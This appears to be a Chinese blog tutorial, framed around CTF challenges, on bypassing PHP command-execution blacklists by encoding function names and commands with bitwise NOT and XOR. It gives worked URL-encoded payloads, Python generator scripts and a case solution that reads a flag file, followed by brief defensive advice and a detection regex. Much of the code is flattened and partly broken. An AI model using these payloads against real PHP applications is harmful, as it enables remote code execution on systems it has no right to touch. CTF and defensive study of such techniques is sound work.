当前位置：首页 > article >正文

从CTF实战出发：手把手教你用取反、异或绕过PHP命令执行黑名单（附脚本）

article 2026/4/22 0:31:37

从CTF实战出发手把手教你用取反、异或绕过PHP命令执行黑名单附脚本在CTF竞赛和安全研究中PHP命令执行漏洞是常见的考察点。面对严格的黑名单过滤机制传统的攻击手法往往失效。本文将深入剖析两种高效绕过技术——取反和异或运算通过真实CTF题目演示如何手工构造Payload并提供可直接复用的Python自动化脚本。1. 理解PHP命令执行黑名单机制典型的PHP命令执行漏洞常出现在eval()、system()等函数中。防御方通常会采用黑名单过滤危险字符$blacklist [system, exec, passthru, cat, flag, , |, ];传统绕过方法如拼接字符串、使用通配符等容易被现代WAF识别。取反和异或技术的优势在于非直观性生成的Payload不包含任何被过滤的关键词数学确定性通过位运算可精确生成任意字符低检测率多数规则引擎难以识别编码后的恶意指令注意实际测试中发现部分环境会对URL编码进行二次解码可能导致Payload失效。建议先在本地环境验证。2. 取反运算绕过技术详解取反(~)是PHP中的位运算符配合URL编码可构造任意函数名和参数。以经典的[极客大挑战 2019]RCE ME为例2.1 手工构造取反Payload假设需要执行system(ls)其取反构造过程如下计算字符的ASCII码取反值# system的取反计算 s ~ord(s) 0xFF # 结果为0x8F y ~ord(y) 0xFF # 结果为0x97 # 完整system取反~%8F%97%8F%96%91%99%90URL编码后组合(~%8F%97%8F%96%91%99%90)(~%93%8C%DF%D0)2.2 自动化生成脚本以下Python脚本可自动生成取反Payloaddef generate_negation_payload(func, cmd): def negate(s): return .join([% hex(~ord(c) 0xFF)[2:].upper() for c in s]) return f(~{negate(func)})(~{negate(cmd)}) # 示例生成system(cat /flag)的Payload print(generate_negation_payload(system, cat /flag))3. 异或运算绕过进阶技巧当取反被过滤时异或(^)是更隐蔽的选择。其核心原理A ^ B C ⇒ C ^ B A3.1 异或Payload构造步骤选择允许的字符集如a-z通过三重异或生成目标字符# 生成字母n的示例 n ord(n) a, b, c ord(c), ord(d), ord(i) assert a ^ b ^ c n # True组合成完整函数调用((%8F%9E%96%9C^%FF%9C%FF%9B^%FF%8F%FF%96))((命令))3.2 智能异或生成器以下脚本自动寻找可用异或组合from itertools import product def find_xor_combination(target, charset): target_ord ord(target) for combo in product(charset, repeat3): if ord(combo[0]) ^ ord(combo[1]) ^ ord(combo[2]) target_ord: return combo return None # 示例生成print_r的异或表示 allowed_chars acdefghijklmnopqrstuvwxyz print_r_chars [] for c in print_r: combo find_xor_combination(c, allowed_chars) print_r_chars.append(combo)4. 实战案例多层过滤绕过以[ISITDTU 2019]EasyPHP为例题目限制过滤了数字、引号、空格等字符限制使用的唯一字符数≤134.1 突破方案使用异或生成print_r(scandir(.))通过字符复用减少唯一字符数# 原始Payload字符数16 # 优化后方案 payload ((%8F%9E%96%9C%9C%A0%9E)^(%FF%9C%FF%9B%9B%FF%9C)^(%FF%8F%FF%96%8C%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))最终获取flagreadfile(end(scandir(.)))5. 防御对策与检测方法作为防御方建议采用白名单替代黑名单只允许预期字符语法分析检测非常规函数调用执行监控记录异常进程创建行为检测取反/异或攻击的规则示例/$~[%\w]$\s*$~[%\w]$/i6. 工具化实践将上述技术整合为CTF辅助工具class PHPPayloadGenerator: def __init__(self): self.methods { negation: self._generate_negation, xor: self._generate_xor } def generate(self, method, func, cmd): return self.methods[method](func, cmd) def _generate_negation(self, func, cmd): # 取反生成逻辑 pass def _generate_xor(self, func, cmd): # 异或生成逻辑 pass # 使用示例 generator PHPPayloadGenerator() print(generator.generate(xor, system, cat /flag))在最近参加的CTF比赛中遇到一道需要同时绕过disable_functions和黑名单的题目。通过组合取反和异或技术最终用三层嵌套的异或Payload成功读取flag这种实战经验让我深刻体会到位运算在绕过中的强大威力。

从CTF实战出发：手把手教你用取反、异或绕过PHP命令执行黑名单（附脚本）

相关文章：

从CTF实战出发：手把手教你用取反、异或绕过PHP命令执行黑名单（附脚本）

5分钟快速修复损坏MP4视频：untrunc终极指南

nli-distilroberta-base镜像免配置：一键生成HTTPS证书并启用TLS 1.3加密

CANoe数据回放踩坑实录：从BLF文件清洗到节点过滤，我的避坑指南

树莓派4B接移动硬盘总掉盘？一文讲透USB供电‘潜规则’与固件配置真相

Stanford Doggo深度解析：打造高性能开源四足机器人的实战指南

如何快速掌握Steam成就管理：SteamAchievementManager终极实战指南

Qwen3.5-2B模型在Dify平台上的无缝集成：打造可视化AI工作流

DayZ社区离线模组：如何打造完全掌控的单机生存体验？

终极指南：5个快速解决Ryujinx模拟器常见问题的完整教程

OpenWrt网络性能优化：如何通过turboacc插件提升路由器转发效率300%

【研报321】电动车行业策略：动储共振迎景气拐点，全球锂电量价齐升

别再死记硬背了！用Python可视化带你秒懂p-积分的敛散性（附完整代码）

ONNX到PyTorch的终极转换指南：onnx2torch完整教程

Win11自带的数据保险箱：手把手教你用BitLocker给硬盘上锁（附恢复密钥保存指南）

打造个人专属数字图书馆：Talebook私有书库的三大核心优势

51单片机数码管显示入门：从硬件接线到代码实战，手把手教你点亮第一个数字

紧急预警：Dify v0.12.3升级后Webhook签名机制变更！3类存量集成即将失效（附热修复补丁）

Dify权限体系深度拆解：5大高危配置漏洞与7步零信任加固方案

PCIe设备初始化避坑指南：手把手教你正确配置Command寄存器（Type 0/1 Header详解）

别再傻傻分不清了！一文搞懂4G/5G动态频谱共享DSS与静态共享的核心区别

MyBatis报错‘Error attempting to get column‘？别慌，这3种原因和解决方案帮你搞定

从JetSnack源码实战出发：聊聊Compose项目里，那些被我们忽略的‘隐形’性能损耗点

搞懂PCIe的BAR配置：从DWC控制器实例到Linux驱动中的内存映射实战

彻底根治 Vue Router 动态路由 404 顽疾：三层防御体系深度解析

终极Adobe Illustrator自动化脚本集：7个免费工具让你设计效率翻倍

MySQL登录踩坑记：为什么你的`show databases`总提示‘Ignoring query to other database‘？

Cursor Pro限制突破：终极免费解决方案完全指南

维修案例---win11安全中心空白恢复办法

漫画下载革命：8大网站一网打尽，打造你的个人漫画图书馆